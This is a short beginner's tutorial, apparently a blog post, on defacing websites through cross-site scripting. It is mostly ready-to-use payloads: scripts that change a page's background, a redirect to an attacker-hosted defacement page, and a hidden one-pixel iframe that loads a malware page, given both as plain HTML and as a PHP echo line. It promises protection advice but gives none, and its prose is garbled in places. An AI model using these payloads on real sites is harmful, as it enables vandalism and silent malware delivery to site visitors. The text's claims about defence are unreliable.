Deface a Website With Cross Site Scripting
it will work on sites with an XSS vulnerability.
Defending is one of the most common cases where a hacker finds a vulnerability on a website.
Defacing changes the content of the site to hackers.
In most cases, an attacker uses this method to report a vulnerability to an administrator.
But that’s a bad idea ..!
Here are some of the easiest ways to protect websites from XSS vulnerabilities.
Change The Background Color Of a Website
<script>document.body.bgColor="red";</script>use this in your target website like
http://www.targetwebsite.com/<script&...y.bgColor="red";</script>Change The Background Image Of A Website
<script>document.body.background="http://your_image.jpg/";</script>Defacement Page
First Of All Upload The Distorted (HTML) Page To Pastehtml.com And Get The Link.
When You Find A Vulnerable XSS Site, Paste The Script.
<script>window.location="http://www.pastehtml.com/Your_Defacement_link";</script>This script will redirect the page to the paste HTML error page.
You can only remove persistent vulnerable XSS sites.
Defacing with iframe Injection
<iframe src=”http://malwarewebpages/web.html” width=1 height=1 style=”visibility:hidden;position:absolute”></iframe>For php webpages :
echo “<iframe src=\”http://malwarewebpages/web.html\” width=1 height=1 style=\”visibility:hidden;position:absolute\”></iframe>”;Conclusion
These Are Some Of The Simple Methods To Deface An XSS-affected Page.
This Will Be For Beginners. However, There Are Other Ways To Screw Things Up.
Never Use This Technique. This Is For Educational Purposes Only. We Are Not Responsible For Any Incorrect Use. Try Your Own Risk.
